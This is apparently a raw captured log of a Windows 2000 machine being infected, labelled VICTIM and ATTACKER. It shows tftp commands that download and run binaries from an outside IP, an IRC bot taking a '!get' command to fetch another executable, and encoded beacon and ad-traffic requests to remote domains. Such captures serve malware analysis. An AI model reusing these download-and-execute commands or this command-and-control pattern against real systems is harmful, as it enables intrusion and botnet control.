VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
    C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\wins
    File Not Found
    C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\dllcache
    File Not Found
    C:\\WINNT\\system32>
VICTIM: tftp -i 222.232.195.157 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: Transfer successful: 54544 bytes in 44 seconds, 1239 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 222.232.195.157 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: Transfer successful: 19968 bytes in 16 seconds, 1248 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK wiluseee
    USER f020500 . . :-
VICTIM: Service Pack 2
    JOIN &virtu
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG wiluseee :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe
VICTIM: GET /p/out/kp.exe HTTP/1.0
    User-Agent: Download
    Host: shabi.coolnuff.com:2012
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.1284296 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /myck.jpg?t=0.3910028 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: ru.coolnuff.com:2011
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=5749F91DD747DB7F27CAB0EA7903E023970C2016250429EE172ECBB9E73EDFF83F76B7533805EBB66209B9D02D215BB466A1F319EE700755D3E39C366A1D741F297AFF8B4986F867774DC7BD22CC1FC029DE7944EF914E482280422FBE47A6DC0B6AF3EDA8B32BB6EA594ACD070726BCF601735CE4A3C7E0A9F0CEA1AF190FB11810F35A331DED2F80B1F3AAC801A8D6&t=0.682873 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=001E72969D0D4AEEA64B98C2245E09CAAE35F4C2F2D338FF97AE1C6E15CC3C1B7F36C226477A7A278BE089E0707CC827894E17FD6BF52270D4E46CC60D7A9FF4782B720664ABA33C97ADD5AF3CD2558A0CFB1429E89654524DEFD9B43FC6A5DF96F7859BE4FFF06D44F71086CA33ED657E8B104EF8AB192B1B0F17628A28AD57C0D042E4F9CDD01849700F589C590C706BB7&t=0.5246698 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=100 HTTP/1.0
    User-Agent: CA 0.0.0.2
    Host: myck.nucleardiscover.com:88
ATTACKER: GET /ck3.jpg?t=0.1654169 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: ru.coolnuff.com:2011
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET / HTTP/1.0
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: arizonadivorcechildcustody.info
    Connection: Keep-Alive
ATTACKER: GET /sn.php?c=1907678370E06DBF58B0614C98E0F0021FD65F68EBB9549820431557DA0194B27903FF1280ECAF9F407EA6CBD8E206EF5F981FF92EB10556A28DD472D3AF05740E7286FE15C471EE754F93E96E8028F747B07548FC822325AB098CE131C85822CEAF1D03CCD7DE437BC89A1D080851CBED1A240B1354785FE1B84E21C177259BEEE7248E82B25D9A19236B389151B93D&t=0.3853876 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /?o_id=62461&domainname=arizonadivorcechildcustody.info HTTP/1.0
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Connection: Keep-Alive
    Host: searchportal.information.com
ATTACKER: GET /?epl=Jyzn9J9R_qn-R4eIRjtG6gDa-kQgJBROkdzF3iCqj9oF2mrlXIzIDB21Z0bTcYRPLbFBNA1ZsWyKupvEzKTjjkwH30ADqmMtHPC1b4ldu6jhEsOzoRCUKZOxlMYpGw0mjaRjhar-BudKw1kIsUgxU3ki8VY9VII72zNNRSyeQyWGwagqCJLMe7TKNDhIabhHEg1bUw8BEWUrlwRNc0fEEUciN7AYHK27BGNx-sENBPJREQJEC9SlqjPOMZFGDVH2YF6bHFWveNt_AzCipsZgyCEC_LowCBeOU65QHxYjPSZxt-rmuiN2diSEWj1a6IIhO3QipBMUBk35Xr3rJkdx3EpoU2vRpOFys5nf6NoUEJla2zLLSXpkEKDJtFHhKRkZlQDQANITPTXEKEw00KinnmozMZoy9VP9NPVUP0o_1U_VwLQtATDw3_-_AADgfwUAAECAWxwAAGjrE4FZUyZZQTE2aFpC5AEAAPA HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: searchportal.information.com
    Connection: Keep-Alive
    Cookie: arizonadivorcechildcustody.info=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0; ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Arxzwwspvwxtusrvu; Spusr=3c0015ac27f44e05e0582e5e
ATTACKER: GET /css/0/landing/en.css HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /css/782/landing/en.css HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/bg_main.jpg HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/bg_searchbox_left.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/bul_arrow_orange.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/bg_searchbox_right.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/bg_searchbox_textfield.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/but_search_left.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /images/782/but_search_right.gif HTTP/1.0
    Accept: */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: cdn.dsultra.com
    Connection: Keep-Alive
ATTACKER: GET /sn.php?c=F2EC7A9E91016DBFE70FFED31961D82AD910D2E5E1B3F13D781B7032CC171E38641E907D036FF7C7A8969CF196AC55BC8443658366F9ABF8705F14B2423E9AEB5D21631B5081BF203E040D77AF41D00FC73082BF5A24E7E175D7E08D50A91D67CEAF1F01F2E95BC6EA598B1DAC556DE532C77826D784586A687C3144DE7CEE14E7F73198A0929F202D1B96C216D092EE964B&t=9.649295E-02 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /?epl=irtS6LvarmHL2QSqHSknOvAv0oULCYVTJHfxn0fVtXHScqLhq8d35goREjWFNZHSssDrQifXYpZOFXqvMj1H1WpQA-0Km6M1l3NYLlIjg4d8AI2Txg6v8D0J_r2E5e0hRi5a3QhhjSaFUojRLiZMNbLWGboGDo6ckWyYZcqfV0VIIBhByVkHiKpVjzMdEZoSmHBwjRootgt59VKCDDU1w7LYMmyS-sAGZJN2UUjCsXZMu5RItZrVNtSFzUPT8ytuCPu5RbX4A7Rl8LO94xRB-fBt3tiYiOkT93XdsPrOefuCqyUhRTMilI24kBHMg8JhqytCSiBpYL-vFtB9KewMGKq8ZiPRIkbVoIMyS7KRMWQf76VZjXm-Lcz6oitfeJ5ixy5OabsxRMwJYIz28_0Ho39bAKgHmoyon2TKE5FBBrVRTxNTQ81EmiY8VYKG2jT1pOkpAiZP0TRNGqyZTQEw8N__vwAA4HsFAABAgNseAAD_Il24WVMmWUExNmhaQhMCAADw&query=divorce HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.info
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: searchportal.information.com
    Connection: Keep-Alive
    Cookie: arizonadivorcechildcustody.info=search%3A0%7Cexitpop%3A0%7Clload%3A1309007961%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0; ident=search%3A0%7Cexitpop%3A0%7Clload%3A1309007961%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Avvzrywpwpusqpptv; Spusr=3c0015ac27f44e05e0582e5e
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PONG :i.
VICTIM: JOIN &virtu